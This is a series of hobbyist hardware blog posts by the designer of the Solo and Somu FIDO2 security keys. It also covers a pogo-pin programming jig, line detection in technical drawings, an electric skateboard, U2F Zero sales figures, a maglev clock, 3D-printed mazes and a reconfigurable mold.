Designing Somu, a tiny security key

Somu is the same technology as Solo, but in a tiny form factor that fits in your USB port. You can use Somu as a U2F or FIDO2 authenticator, which allows you to log into websites and other services, . The name is inspired by Tomu, which was the first open source key using this form factor.

The team at SoloKeys and I are planning to Crowdfund Somu at CrowdSupply. If you’re interested, you can sign up to get an announcement when it’s available.

D4Dg15hXoAAj2l6.jpg

The PCB is a 1 mm thick 2-layer board, , with Z-axis milling. The milling makes the short tabs on the sides so the PCB can "slide fit" into the case.

The end of the circuit board is fully edge plated and makes 2 capacitive touch sensors, which act as the buttons. Right now there’s no use case for 2 buttons, so they will be used as one button. Maybe there will be a case in the future.

The case will be a relatively stiff rubber material so it will slightly flex around the PCB tabs and still be fine to plug into a USB port. Circuit components are on the bottom.

D4Di93uX4AETLBu.jpg

Judging from my rubber hardness sampler, Shore 90A *feels* about right. I also used this to help pick the case hardness for Solo.

I printed the circuit board and case. Circuit fits in case well. Circuit+case fit in USB-A port well. Next is to order real PCBs.

An interesting challenge with the PCBs is that the board is nearly one layer since you can only make very few vias without interfering with the USB traces.

And the components make a very tight fit. 1 MCU, 9 jelly beans, 1 RGB LED, 1 linear regulator. Plus two capacitive buttons, USB traces, and 4 test points. I was doubtful this would fit on a 10x11mm space on a "1.5" layer board but it does!

Since the components are all the same as on previous Solo models, and the routing is also largely the same, the same firmware can be used for all models. This keeps things simple.

I ordered the PCBs from PCBWay for about $250 since they support edge plating and Z-axis milling for their prototype service. Communicating the requirements was pretty straight forward, and I got the PCBs back in about 2 weeks.

I hand soldered all 20 PCBs that I ordered. It took some patience, but it’s for sending samples to reviewers while we run our Crowd Supply campaign. If you’re interested in reviewing (or anything else), let me know and I can send you a sample.

Just like Solo, Somu is open source and easy to develop for. It’s also a secure option to use as a security key! If your interested, check out Crowd Supply, or sign up to our announcement list.

/

Never miss a post

3D printing a programming jig and embedding pogo pins

When using a microcontroller in a custom design, there's always a bit of a headache for me because I need to figure out a convenient way break stuff out for programming and development.

Usually you can't afford to have the "plug and play" comfort of a development board on your custom board. And it's great to be able to break out more stuff than just the programming ports.

Here I explain an easy way to make a nice programming jig that can break out many signals for custom designs.

It is based on Eagle and Fusion 360 but you don't need to use those tools. The main things you need are:

Design your circuit

Here is the backside of my circuit.

I put little test ports on the back side for every signal that I potentially would like to break out. I didn't want to adhere to a 2.56mm x 2.56mm grid because that would strain the layout. I just made sure to keep them at least 1.27 mm distance from each other. It is pretty easy to break out signals this way, even when the layout is crowded.

Design the jig

Then, I exported my board from Eagle to Fusion 360 and took a minute to draw up a jig.

It's a pretty basic design. It just needs an outline to fit the circuit and a cutout so it's easy to get out. Since this is going to be 3D printed, you can go wild with your design.

Then, draw some circles where all the test pads are and cut them out of the jig. I just eye balled everything, didn't need to take any measurements.

I also included the pogo-pin models from the manufacturer to make sure they fit right. These particular pins are nice because they are both solder-cup and spring loaded. The pitch is about 2.2 mm which is the smallest I could find. Thanks Mill-Max!

Print the jig

I printed the jig on my Form 2 printer. It came out well.

The relevant diameter on the pogo pin is 1.5 mm and it has a press-fit ring that is ~1.62 mm. I set my holes to be 1.61 mm and the pins press fit into them well. You mileage may vary, I recommend printing 2-3 different ones at first.

Assemble the jig

The nice thing about solder-cup pogo pins is that they are really easy to solder.

I just soldered a wire to each one and plugged them into my jig.

The tedious part is matching the pin outs to your various programmers and UART cables.

Use the jig

Now for the exciting part.

It programs and... It blinks! First try!

I was able to design my jig to easily accommodate both my USB A and USB C designs.

All in all, I'm pretty pleased with this method and will do it again if needed. If you can recommend any improvements, let me know!

By the way, the design you see is my secure, two-factor authentication token, Solo!

/

Never miss a post

Designing Solo, a new U2F/FIDO2 Token

For the past couple years, I’ve been selling U2F tokens on Amazon. I’ve been selling an average of 150 units per month and have ordered multiple batches over the past two years.

Due to recent developments with FIDO2, WebAuthn, and various features people have been requesting, I’ve started an upgrade for U2F Zero. A couple collaborators and I have decided to call it Solo (or Solo Key). It is the sole thing you need to secure your accounts :).

Update: Production for Solo has been funded by Kickstarter and we are live with sales :).

What is U2F or FIDO2?

U2F is a standard for two factor authentication. Many websites like Twitter, Google, Facebook, etc, support it. After you enter password, you insert token, press button, log in. It provides very strong protection against account theft and phishing, much more then SMS or time-based codes.

FIDO2 is an upgrade to the U2F standard and is planned to have even more ubiquity. FIDO2 is planned to be used as a password replacement. On some services, like Windows 10, you can already use it in place of a password.

Solo

The original U2F Zero was just a plain circuit board that only did U2F over USB. Solo will have the following features.

  • USB-A and USB-C option
  • NFC support for mobile devices
  • Flexible + durable case that embeds a tactile button
  • Various color options
  • FIDO2 protocol support
  • Easy, web-based secure update process
  • Good documentation for everyday users

And of course, everything will soon be open sourced like with U2F Zero.

Design

Development started completely in software, no hardware, to make sure it could be easily contributed to by others. Most coding and testing can be done solely on a PC, while being designed to be easily ported to other chips, like the NRF52840 by Nordic Semiconductor and EFM32J by Silicon Labs.

PC-only testing is achieved by patching Yubico FIDO2 Python API to exchange messages with a PC application instead of a USB HID device.

After verifying a "first draft" of the FIDO2 implementation, I ported the design to an NRF52840 development board and to a Silicon Labs EFM32J development board.

NRF52840 Bluetooth, NFC, USB SoC EFM32J + EFM8UB1

I ultimately decided to go with the EFM32J. It consumes less power, is much cheaper, and is easier to solder (QFN32 vs BGA). NRF52840 initially seemed like a great solution since it has everything in 1 chip, but it brings more complication and cost. Plus it would make it much harder for people to solder their own Solo key.

The design is modular in that USB and NFC support is added by adding another chip. The EFM8UB1 provides the USB HID interface, and the AMS 3955/3956 provides the passive NFC interface. NFC also requires a coil, which will be an external coil that lies flat next to circuit, all in case. More on this later.

Hardware key isolation

Providing some sort of hardware isolation for secret key material is hard since most of the chips on the market that can do that, require a NDA and that the company be a bank, government, or other reputable entity.

There are the ATECC508A and ATECC608A crypto chips, which can be obtained easily. U2F Zero actually uses the ATECC508A for key isolation and crypto acceleration. But since U2F/FIDO2 devices need to derive secret keys at runtime to be able to work with an unlimited number of services, the ATECC508A doesn’t work out well. This is because to derive a key at runtime, you typically need to compute an HMAC that’s keyed with a master secret, and store the result as the runtime key. This needs multiple interactions with the ATECC508A and requires the runtime key be stored temporarily on the MCU, which tarnishes the idea of key isolation.

I’m not aware of any other attainable crypto chips that can do better than this.

It’s best to keep the design simple rather than lob in a security chip that isn’t a good fit. The main threat is adverse software on the computer you plug your token into. Solo’s firmware isn’t complex, so it is reasonable to try to avoid buffer overflows and similar exploits. If a critical bug is found, a signed update process is supported so it can easily be patched. This model generally works well in industry (Trezor, the popular bitcoin wallet, is successful with this approach) and greatly simplifies the design of Solo.

Hardware design

Previously I’ve only used Kicad for PCB layout, to include the design of U2F Zero. For Solo, I basically did a token design in Kicad, Eagle, and Circuit maker to figure out what is best. I stuck with Eagle in the end, because of the nice integration with Fusion360, which really helps the mechanical design.

The case

We want our device to be something people like to use and carry around (unlike most 2FA options out there). So getting the look and feel of it right is important.

We have two designs for the case. One can be printed on a SLA printer ($2.50 from DirtyPCBs), and the other we are getting professionally molded. Both designs take advantage of a thin mechanical button that provides nice tactile feedback.

The additively manufactured design allows people to produce their own. It consists of a top and bottom piece that snap together over the circuit board. The bottom piece also removes the 2mm requirement for PCBs.

The molded design will be a semi-hard silicone “sock”. It will be pocket-friendly, nice to hold, and allow embedded mechanical button to be used. Multiple colors can be offered.

The design is still being iterated on and current photos are from a 3D printer.

USB-C

Two versions of the PCB will be produced to support USB-A and USB-C connectors.

We will aim to re-use the same case for USB-A and USB-C.

NFC Support

For a long time, I thought passive NFC support wasn’t going to work out. The only MCUs out there that can run passively on an NFC interface, and communicate bidirectionally, are aforementioned forbidden security chips. But there are a couple of chips out there that just provide an NFC interface, and an energy harvesting capability.

The AMS 3956 is one good example. AMS 3956 is extra special because it allows for NFC type 4 emulation, a requirement for U2F/FIDO2. Other energy harvesting ICs, like the NXP NT3H2111, just implement NFC type 2.

It is also critical to use a low-power MCU to pair with the AMS 3956, like the silabs EFM32J, because the harvested NFC power is pretty low, around 3-5 mA at 3V in my tests.

It will still take more design effort to finish the NFC version. Some low level NFC communication details need to be implemented, and the coil needs to be designed and tuned.

Signed firmware updates through browser

Signed firmware updates are supported via an extension to the U2F/FIDO2 protocol. No extra software needs to be installed. In case any critical bugs are discovered, it will be very easy to update.

Users will be able to get any new features added by me or the community. Developers will be able to reprogram the firmware using a hardware debugger.

Updating is a matter of holding down the button and visiting a website

Kickstarter

We need some funding to be able to bootstrap this. To make this project affordable, i.e. reaching scale on both the PCBs and molded case designs, we would like to be able to order 10,000 units. We could get away with like 3000, but our numbers really start to look sustainable at 10,000.

A successful crowdfunding campaign would really help get this project on the market. We would need a minimum of 1000 backers, but we really start to shine if we can get around 4000. Assuming an average 2.5 “base” units per backer, we could reach our 10,000 units sold goal.

From there, we would be in a great place to continue working on making a great 2FA/1FA device for the masses.

Update: Our Kickstarter ended you can see the product version here.

/

Never miss a post

Detecting lines on technical drawings

Over the past few months I've been working on a program to convert images of technical drawings into digital formats.

In other words, the program will convert an image like this.

Into a digital format that can be used in a CAD program.

Kicad

One of the basic necessities of such a program is that it needs to detect lines. I've been wanting to write a little about this.

Line Detection with OpenCV

Initially I thought about using some of the powerful OpenCV methods for detecting lines. OpenCV edge detection and Hough transforms are commonly used to detect lines. They would be great for detecting lines like the traffic lines in the following image.

I tried using this method for extracting lines from my drawing images but I don't think it works well enough.

Initially, it seems to work well.

<! data-preserve-html-node="true"--Blue lines representing the detected lines are drawn over the image.-->

But on closer inspection, it has some issues.

Here it is missing some lines that I wish it detected.

Here it detected some lines that I wish it didn't.

I tried experimenting with the various parameters for edge detection and the Hough-transform line detection. I was able to make it better but the amount of missing lines and false positives are always significant.

I could try various amounts of post-processing and probably still make it work for my application, but I don't think it is a good solution. I think are much easier methods that can take advantage of the properties of my input images.

For one, most technical drawing images are all just black lines and shapes with a white background. This separates them from most camera captured images, which are more suited for OpenCV's prowess.

Better line detection

Let's just focus on horizontal and vertical lines.

Remember an image is just an array of numbers. In my case, it is a black and white 2D image. With all the pixels basically being either 255 (white) or 0 (black).

Here is a sample image. There are two lines and one happens to be twice as wide as the other. I want to detect exactly two lines accurately.

How would you do it?

.

.

.

.

I took a simple signal processing approach. Sum the rows and columns and look for spikes.

First invert the image.

Sum the columns.

Sum the rows.

Detecting the lines then becomes as simple as setting a threshold.

I wouldn't stop there though. Input images can get pretty busy with a lot of overlapping lines and shapes. It might not be clear what threshold to use. Check out the row summation of a more realistic input image.

It is really easy to detect the larger lines but the smaller lines won't get picked up by a threshold because of the "noise floor."

So as an extra step the data should be run through a high-pass filter to remove the low frequency "noise."

def butter_highpass(cutoff, fs, order=5):
    nyq = 0.5 * fs
    normal_cutoff = cutoff / nyq
    b, a = signal.butter(order, normal_cutoff, btype='high', analog=False)
    return b, a

def butter_highpass_filter(data, cutoff, fs, order=5):
    b, a = butter_highpass(cutoff, fs, order=order)
    y = signal.filtfilt(b, a, data)
    return y


# im is input image in numpy array

y1 = np.sum(im == 0,axis=0)             # row sum
y1f = butter_highpass_filter(y1,1,25)   # put through high pass filter


plotly.offline.plot([Scatter(y=y1)])    # I'm using Plotly to output graphs
plotly.offline.plot([Scatter(y=y1f)])

The highpass data is overlaid in orange. This is a safer data-set to use for threshold detection.

You might be thinking that the lines aren't really detected all the way. We just figured out one dimension (X or Y) for each line. We don't know where each line starts or how long each line is.

Here are the so called detected horizontal and vertical lines.

But figuring out where the lines start and end is simply a matter of tracing each red line and looking for black pixels.

Detecting non-vertical, non-horizontal lines

For lines with slopes that aren't 0 or infinity, my previous method won't work. I still don't like using OpenCV edge detection and Hough transform for this.

I could do something like rotate the image 45 degrees and detect lines with slope of 1. That might be enough for the types of images I'm working with.

Maybe there's a better way. If you think of something, let me know and I'll owe you a beer.

/

Never miss a post

Quick electric skateboard build

A friend and I recently decided to get electric longboards. Except most of them suck or are pretty expensive.

We figured maybe the DIY route wouldn't be too hard and we could make something pretty sweet.

I wanted to make mine by converting an existing longboard that I already had. That way I'd only need to get the electronics and figure out a way to connect the motor to the wheel. I also kind of optimized for making things easy and didn't want to spend a ton of time on this.

The electronics

The electronics are the easy part. You just need a motor, battery, speed controller, RF receiver, and remote. All of these are commodity RC "vehicle" components. I choose the following parts.

  • Motor
    • This has turned out pretty well, very powerful and robust. I chose a 380 KV motor which works out to a 20-30 miles/hr top speed at a 3:1 gear reduction. It's also small enough to fit under the skateboard deck.
  • Speed controller
    • Works fine and doesn't come close to overheating. Don't need the fan the comes with it. Can source up to 120A which is important to keep up with the motor's capability. I wish the programming options for the controller were better. There's just a simple programming card.
  • RF receiver + remote
    • I choose the cheapest thing. I couldn't really find a good "small" RF/TX remote kit. I'll probably redo the case/handle form factor at some point.
  • Battery
    • Large capacity and discharge capability. Also thin enough for skateboard.

The mechanics

This was definitely the hard part. At first I thought it would be easy if I just used a "all in one" hardware kit on Ebay. But they didn't really fit my skateboard trucks well and were really hard to get aligned with the wheel correctly. It was also really tough to get the custom pulley centered on the wheel and bolted in. And when I did get it bolted in, it wasn't perfectly centered and it was non-trivial to fix.

I decided to custom make the parts to fit my trucks and wheels. I'd need a custom bracket to fit the motor onto the trucks and a custom pulley to attach to the wheel. I'm not experienced with machining and don't have easy access to machining equipment but I do have a 3D printer. I decided to try making 3D printed nylon parts. Nylon is really tough, so maybe it'll work well.

It took some iterations to get right, but here they are.

The pulley pictured is in PLA but the final version was in nylon. It fits to my wheel nicely and I also printed a small dowel to temporarily connect it to the wheel's bearing hole, which keeps it centered while I drill holes for the bolts. I also got new trucks solely because the axle was relatively square which made it much easier to mount the bracket too.

Here's everything put together.

After riding it for a while, I haven't noticed any problems with the nylon parts. I use the same timing belts that the Boosted Board uses and they fit snug in the custom pulley. The parts were printed at about 95% infill to get maximum strength.

Nuts and bolts used

The nylon motor bracket is held in place using 4-5 set screws. I left a ~5.7 mm hole in the 3D printed part and then tapped the hole by hand using a M6 tap. The set screws hold up surprisingly well in tapped nylon. (As a side-note, I've found that Kodiak is a pretty good brand to use on Amazon for taps, bits, endmills, etc.).

The pulley was bolted to the wheel using these nuts and bolts. It's important to use nylon insert lock nuts or they'll definitely come loose. Also should be corrosion resistant.

Improvements

The board works pretty well but there are some definite improvements to make.

Belt slippage

The current 15mm wide, 3mm pitch timing belt isn't enough to transfer the full torque of the motor. So if you apply enough throttle, the belt will slip. This isn't too much of a problem and these belts are designed to slip. It also acts as a torque limit to protect you from applying too much torque by accident and falling off.

But sometimes it's annoying when you're not accelerating as much as you'd like. And hills can sometimes be tough. I think the best way to solve this is to use two speed controllers and two motors for the two back wheels. Twice as much torque would be plenty. The boosted board also uses two motors.

Battery management

Battery management and protection is really important. Namely, you need to ensure none of the cells over discharge, which can happen before the speed controller can detect the overall battery voltage going low. Over-current isn't as much of a problem since the speed controller will limit the overall current. But redundant protections isn't a bad thing to have.

It would also be nice to have a proper charging circuit. Right now I'm just using a special Li-ion battery charger that will charge and balance the cells. If I added a circuit to handle charging, I could just use a regular barrel jack or even a USB cable to charge it.

When I get around to this, I'll make another post.

DIY

If you're interested in making a similar build, hit me up! I'm happy to answer questions or share designs.

/

Never miss a post

U2F Zero year in review

I wanted to share some details on the U2F Project now that it has been on the market for over a year now. This is to give an idea of what to expect in terms of cost and profit from a "DIY-to-market" kind of project like this.

For those unfamiliar, U2F Zero is an open-source secure USB device used for two factor authentication. I made it back in 2016 and did a semi-large PCB-A run and sold them on Amazon.

At the time, I didn't really know what to expect. Were people actually going to buy these? Was I going to get bad reviews? Was someone going to find some security bug in the implementation (open-source)? Is the profit worth the effort? Now I can answer all of these questions.

Starting out

I started on U2F Zero because I wanted to work on something interesting and learn how to make a PCB. Here was my first one.

first PCB

It's poorly laid out. The traces don't give a crap about EMF. And what's a ground plane?

Eventually, I got better at it. The project even got an awesome pull request from Chris Pavlina, who is better at layout than I am.

Business plan

Eventually, I got the U2F Zero "minimum viable product," and it was ready to hit the market.

I basically guessed that the market would sustain 1000/units per year. So I put in an order of 1100 units to a Chinese PCBA fab (PCBCart) totaling about $4,000. The cost is made up of the PCB (~$0.22/unit), the assembly (~$0.44/unit) and the components (~$2.26/unit). All the costs scale with quantity. Had I ordered 3000 units, I would have saved about $0.35 for each U2F Zero. But the last thing you want is 2000 U2F Zeros that no one is buying sitting in a warehouse somewhere collecting Amazon storage fees.

I didn't want to deal with sales and distribution. I was in the middle of grad school and didn't have the time or the interest. So after manufacturing the tokens, I shipped them to Amazon to be fulfilled. This does come with a cost, of about $1.02-$2.02 in fees per U2F Token sold by Amazon.

After manufacturing and distribution was handled, it was time to execute my elaborate market entry plan: write a blog post and post it to Hacker News and Twitter.

Sales

I spent almost a whole weekend drafting my U2F Zero post. I posted it... and it worked.

For the first month, the time between the Amazon shipment and the blog post, there were almost no sales. Then after the post, there was a spike of 207 sales over the following week. Then it balanced out to about 6-7 units per day. And 4 months later, they sold out.

There was even an increase in sales around Christmas time.

And people left mostly good reviews. I wasn't sure if people would leave good reviews since it's just a cheap token with no case. But it's very clear from the listing what it is. So most people will know what they are purchasing -- and as long as it does a good job fulfilling that image -- it has the potential for good reviews. I think that was an important takeaway.

I did get some negative feedback. Some customers didn't like that Firefox didn't support U2F at the time or that the token didn't come with instructions.

There was one technical review that tore U2F Zero to pieces. Amongst the issues the reviewer found, there was privacy issue in my implementation. Not a critical security flaw, but something that would allow each U2F Zero to be uniquely identified when it is used. It was my mistake and there was roughly 1000 units out there with it. I ended up fixing it and am offering replacements for those that purchased an old token.

The reviewer kindly took to opening issues on Github and even updated his review after the firmware issues were fixed.

Profits

As mentioned previously, each token cost about $3.00 to make. But when accounting for the cost of prototyping, packaging, labeling, import taxes, tools, and holding 100 units in stock, the unit cost is really about $4.18. There was about $2.02 in fees from Amazon. The listing price was $8.00. So that works out to be roughly $2k in profit over 4 months which is about a 42% ROI. Not a drop-out-of school kind of haul by any means, but it was a great experience for me and I hope to make similar ventures in the future.

For those interested, I'll list the various costs here.

  • PCBs: $351.10
  • Assembly + components: $3,062.85
  • Shipping: $59.72
  • Tariffs (from China to U.S.): $126.32
  • Labels: $13.98
  • Polybags: $63.25
  • Tools: $164.94
  • Prototyping: ~$350.00

Other opportunities and events

There were some cool unexpected things that happened as a result of U2F Zero. A lot of awesome people reached out or shared how they made their own U2F Zero(s) or purchased them on Amazon.

One of which was Landon Greer, who helped organize an infosec conference and made custom U2F Zeros as a conference badge. Later, the Crypto & Privacy Village at Defcon forked the U2F Zero design and included it in their unofficial 2016 defcon badge.

More recently, the Association for Computers Professionals in Education (ACPE) made a custom order for 400 units and invited me to come spend some time in Oregon and speak at their conference. I really enjoyed it. It was great to learn about a different field and meet new people.

U2F Zero, round 2

A few months after selling out, I decided to do another run. This time I added some improvements to the PCB layout and fix issues in the firmware. I also decided to order 3000 this time (saved that $0.35 per unit) and support markets in Canada, U.K., and Europe. I think the U2F standard is picking up in popularity so the U2F demand shouldn't go away. I'm curious to see how U2F Zero sales differ between different countries.

At the time of this writing, I've sent 1500 units to the U.S. marketplace, 300 to Canada, 300 to the U.K., and 100 to a distributor in Switzerland that will handle shipments to other countries in Europe. I've kept the rest in storage so I can replenish a marketplace easily if inventory gets low.

U2F Zero has been back on the U.S. market for about 4 months now, after being out of stock for about 6 months. Sales slowly picked back up and average about 5 units per day currently.

My goal is to keep the supply up with minimal effort and not have anymore gaping out-of-stock periods. In the meantime, I can work on the next project.

Thanks!

Thank you to everyone that has taken an interest in U2F Zero and to those that have contributed to the open source project so far:

Thank you to everyone that supported U2F Zero and made this possible. I've learned a lot since first making this crappy first prototype and will have more projects to launch later.

/

Never miss a post

Designing a clock with levitating arms (part 1)

At some point I developed an interest in magnetic levitation. And I decided to make a clock with levitating arms. I thought it would be a great opportunity to get some more analog circuit experience. It would also be a pretty cool project to show off. Maybe even a Kickstarter.

At the time, I figured maybe it wouldn't be too hard. There are plenty of magnetic levitating consumer products out there. I could just take a reference design and tweak it to my needs.

It can't just be any maglev circuit though. It should be able to levitate a magnet in any orientation, so you can leave it on a table or hang it on a wall. Typical maglev circuits work by turning on and off one electromagnet continuously to balance a levitating magnet against gravity. In other words, there is one electromagnet that controls the Z axis position. If gravity is perpendicular to the electromagnetic (like with hanging the clock on the wall), then the typical maglev circuit won't be able to counter gravity anymore.

I'm not aware of many consumer products that handle "horizontal" levitation, but I did find this product which can. It comes from some Chinese company which develops "EZ Float Technology." I went ahead and ordered one.

61N7dYWuyjL._SL1500_.jpg

The Reference Design Teardown

I tried out EZ Float Technology and it works quite well. I wasn't able to get it to levitate horizontally in one step, but rather had to start it in the vertical position and carefully tilt it up to what you see in the picture. In stability, it only consumes about one watt of power, and up to twelve watts otherwise.

And interestingly, In the vertical position, the magnet holds like a pound of weight without consuming any additional power -- how could that work?

It's a pretty cool product and is close what I would need to make my clock, I would just need to figure out how to shrink the design as the current magnet is way too big.

Let's see how it works.

Taking the lid off, you see two components that every maglev design needs: electromagnets and sensors. The electromagnets push or pull the levitating magnet in a controlled loop to keep it centered. The control loop is given input by the sensors.

There are a few important design characteristics you can see immediately.

There's a big ring magnet. At first I wasn't sure why that was there but it soon became obvious. The ring magnet polarity keeps the levitating magnet from falling toward the PCB. The levitating magnet can only move to the sides, or in the X and Y direction. This is how it can hold additional weight without consuming more power.

This leads to the next characteristic. There are four electromagnets. These are for aligning the magnet in the X and Y direction. They don't contribute to Z direction control at all (and don't need to). In a conventional maglev circuit, only the Z axis is accounted for. By adding another axis, you would think you would need one more magnet (not 3 more). But in this kind of configuration, there is no symmetrical configuration that can both balance X and Y axes using 2 magnets. So there are 4.

Guess how many electromagnets there really are? Turns out, you can argue there are only two. Each diagonal pair of coils are connected in series. So from a circuit perspective, there are only two coils/electromagnets to drive. So my previous point about there needing to a minimum of 4 electromagnets to maintain control and symmetry is a bit misleading. Since there are only two coils to drive, it makes it much easier to control each coil, using one control loop each.

But if the coils are connected in series, isn't that just producing the same force on both sides, which cancels out? Not if you switch the polarity of one of them. So a "pulling" force on one corner produces a "pushing" force on the opposite corner. Clever!

On the back side of the PCB are some opamps and H-bridges. More or less what you would expect for a typical maglev circuit, but cut-and-paste twice to handle X and Y control. There are some bidirectional switches as well, which handle changing the electromagnets to run in both forward and reverse.

My first attempt

I made a circuit using op-amps, filters, and a couple H-bridges. I simulated it and it did what I expected it to, but there is still a decent amount of uncertainty of what parameters would be best for levitation stability. So I included a lot of potentiometers. Pots for tuning the filtering, the gain, and of course, the reference sensor value representing where the center is.

I breadboarded this monstrosity.

I tested the circuit using a single Z-axis to start and it worked.

But it didn't work well at all when using a ring magnet and four electromagnets. I made a few mistakes, fixed them, and even laid out a board and screwed electromagnets onto the PCB to make a mechanically stable platform with plenty of pots that would hopefully allow me to converge on the magical control loop parameter solution.

PCB with added flyback diodes and incorrect screw terminal footprint.

But it wasn't working. It would levitate for a brief moment, and then oscillate out of control. Every time.

There were a number of problems contributing to this.

Electromagnets caused unwanted feedback in the sensors

The sensors are supposed to respond to the position of the magnet and be indifferent to what the electromagnets are doing. Since the sensors are hall effect sensors and response to any magnetic field, this can be tricky.

One good solution is you place the sensor so it is parallel with the flux lines of the electromagnets and thus picks up zero interference. Only when the levitating magnet moves off-center, will its flux lines have a component perpendicular to the sensor, thus causing a response.

If that is hard to picture, it is okay, I made an MS Paint illustration.

Note how the electromagnet flux lines are nearly parallel with the sensor whereas the levitating magnet flux lines are more perpendicular to it.

I designed my sensors to sit at about halve the height of my electromagnets. However, this wasn't good enough. It's hard to estimate the exact center of the sensor and the center of the flux lines on a home brew electromagnet. So there was always a significant amount of interference.

I solved this by using a standoff as the electromagnet core and putting a set screw in it. This allowed me to offset the center of the flux lines by moving the set screw up and down within the standoff core. It works pretty well.

I'm bad at control loops

Admittedly, this was the bigger reason my circuit didn't work. When the levitating magnet oscillates out of control, it is mostly due to overshoot). Basically, if the magnet is off center by 1 mm, it will get pushed over to -1.2 mm, and then to 1.5 mm, and then -1.9 mm, and then 2.6mm, and then WHAM. It slams into the side of the ring magnet. This kills the ring magnet.

The solution to overshoot is to subtract away a component of the derivative of the position (i.e. the velocity). So when the magnet gets from 1 mm to 0.2 mm, it is going faster and the controls should start pushing the opposite way to slow it down in anticipation of overshoot.

This should be familiar to those that have worked with PID loops. The P (proportional) term corresponds to the control loop just responding based on how far away the magnet is from the center. The D (derivative) term is the counter to overshoot. The I (integral) term isn't needed for my system but it's good to research it if you don't know it.

My original design had some high pass filtering which acts as a "D" component. But it wasn't good enough. I switched to a Teensy and wrote the PD control loop there to get something quickly.

I made a pretty good workflow for tuning the PD parameters and it responded about every 10 μs, which is pretty good considering the oscillations are above .01 s in period.

But no matter the PD parameters, it still doesn't work. If I "fix" either the X axis or the Y axis with a jig, it works. But never together. And overshoot wasn't the issue anymore. It would be stable in the X and Y, and then start oscillating in the Z, which would mess with my precious X and Y PD parameters and throw it off. I guess when all electromagnets are on, it pulls the magnet down a bit, and when the electromagnets switch direction, the magnet shoots up, causing the oscillation.

It needed just a wee bit of damping to slow it down. I added some steel sheet cutouts to the top of the levitating magnet. This damps it by making it heavier. It also causes an attraction to the ring magnet and I think that contributes to damping.

And finally, it works!

The next improvements

The design is still far from perfect. It only tolerates about a 30 degree change in orientation before the magnet falls. I need at least 90 degrees. My PD parameter tuning may be over but there are some more parameters I need to tune.

Coil inductance. A larger coil inductance means it takes longer for the control loop to actually change the magnetic field. A series inductor acts like a low pass filter. So while my control loop frequency was about 100 KHz, the inductance of my electromagnets actually limits it to somewhere between 1-10 KHz. I need to try reducing the number of turns per coil. If I halve the number of turns, it halves the magnetic field strength and quarters the inductance. This might be a good trade-off.

Electromagnet height. Making an electromagnetic longer provides diminishing returns for increasing field strength. So reducing the length could provide another good inductance vs. field strength trade-off.

Levitating magnet weight and iron component. Making the magnet heavier certainly adds a damping effect. But I would like it to be light enough to hold at 90 degrees. And adding magnetic material to it causes an attraction to the ring magnet, which I think provides a damping effect but I'm not sure.

I'm pretty sure that the coil inductance and the magnet weight are pretty related. I think by reducing the inductance, I'll be able to support a smaller magnet. Another thing I could do is increase the driving voltage but that adds some circuit complexity.

Parameter hell

I would really like to model this and make some well founded estimates on what everything should be, based on my 90 degree orientation constraint and optimizing for a small magnet size. But I'm not sure how to relate everything. If anyone could provide some thoughts on this, I would greatly appreciate it.

/

Never miss a post

Randomly generating 3D mazes to 3D print

I recently got a 3D printer for home prototyping. One thing I wanted to make was a puzzle that took advantage of the strengths of 3D printing. I didn't really find anything I liked on Thingiverse so I decided to write a program to randomly generate 3D mazes.

Randomly generating a maze

Mazes can be represented as a discrete set of vertices and edges, i.e. a graph). Imagine a grid of squares, where some of the sides of the squares are missing. Each square is represented by a vertex, and a missing side of a square is represented by an edge. To randomly generate a maze, we can start with a set of vertices with no edges, or a grid of squares with no breaks. The number of vertices is determined by how big we want the graph to be. Then, we add edges, or "breaks," to the vertices until the maze is complete.

The resulting graph representing a classical maze has a few properties. It is connected, meaning there is a path connecting any two vertices, i.e. no vertices are isolated from each other. The graph is also a tree, meaning it has no loops (trees are also connected). I.e. for any two vertices, there is only 1 path between them. While mazes can have loops, it is something you can easily add afterwards by randomly adding edges, so I will ignore loops.

There are multiple algorithms that can randomly generate trees on a set of vertices. I decided to use Prim's algorithm because it has a defined starting point. So it may generate mazes that are easier to solve in reverse, thus providing a hint to the person trying to solve it. 3D Mazes can get pretty hard.

My program

I wrote a Python program that uses randomized Prim's algorithm to generate a graph that represents a 3D maze. It is similar to a grid a squares with "breaks" in it, except it is cubes instead of squares. The graph is passed to a set of functions that output openscad based on the graph nodes and how many walls they had broken.

Below are some building blocks that get used to build the 3D maze based on each vertex in the graph and how many edges/walls it has.

Here is an example 5x5 maze.

The start is marked in orange and the exit is marked in red. The exit is chosen by finding the node that is furthest from the start while still being on an outside face. Ideally, the exit is one of the leaves of the tree.

3D Printing

To 3D print this, you need to make the paths cut out of something else. I added a couple options to my program. You can subtract the maze tunnels from a large cube, making a solid where you cannot see the paths inside. Or you can subtract a scaled down version of the maze from itself so it hollows out the tunnels, pictured below.

I decided this looked the coolest. And because it is a mesh of tunnels, it would be hard to fabricate by conventional means. No problem for 3D printing! The largest challenge at this point is the time it takes to print. The model itself will take on the order of hours to render on openscad. Printing could take on the order of days to print, especially if you include support material. Then it could take awhile to remove support materials.

I first tried going small, printing a simple 3x3 maze.

With PVA support material, it took about six hours to print and a few days to fully dissolve away the PVA with a bowl of water.

I decided to make one improvement by slicing small holes in all nodes of the maze, so all the internal PVA supports dissolve much quicker.

Here is a 7x7 version with PVA supports. It is about 70mm cubed.

It took just over 3 days to print. It took another two days to dissolve the PVA. The small cutouts turned out to be pretty effective at getting rid of the internal PVA supports.

I got a small ball bearing to test out playing it. It is a little difficult to navigate as the ball falls past paths quickly. I haven't solved it yet and I'm not sure how much playing in reverse helps. 7x7 might be a little extreme.

I should have added a solution output to my program.

Wrap up

As usual, my program is on Github. If you try it out, let me know if you have any success.

/

Never miss a post

Proof of concept for a reconfigurable mold

If you want to mass produce some physical product in a short amount of time, chances are you would need to get a mold made. Most plastic parts get made via a plastic injection molding process, where molten plastic is injected into a mold cavity under high pressure, cooled quickly, and then ejected. For mass production to work, the mold needs to be durable enough to last for thousands of injections. Commonly they are made out of steel.

It is nontrivial to create one of these molds as it costs on the order of thousands of dollars. Thus it can be intimidating to get into this process at first because of the cost. If molds could be reconfigured such that they could easily be reused for different parts, then a lot of money could be saved.

I recently got interested in plastic injection molding and also wanted to get better at mechanical design. So I thought I would try to design my own reconfigurable mold. It ended up not being practical and more of a proof of concept. Here I show what I made and its results.

Reconfigurable Pin Tooling

Reconfigurable pin tooling is an idea where you have a discrete bed of pins that make up the mold surfaces. Each pin can be actuated to replicate any "moldable" part design. The following figure from [1] shows the basic idea using 2 surfaces. A complete mold would need 6 surfaces.

From [1]

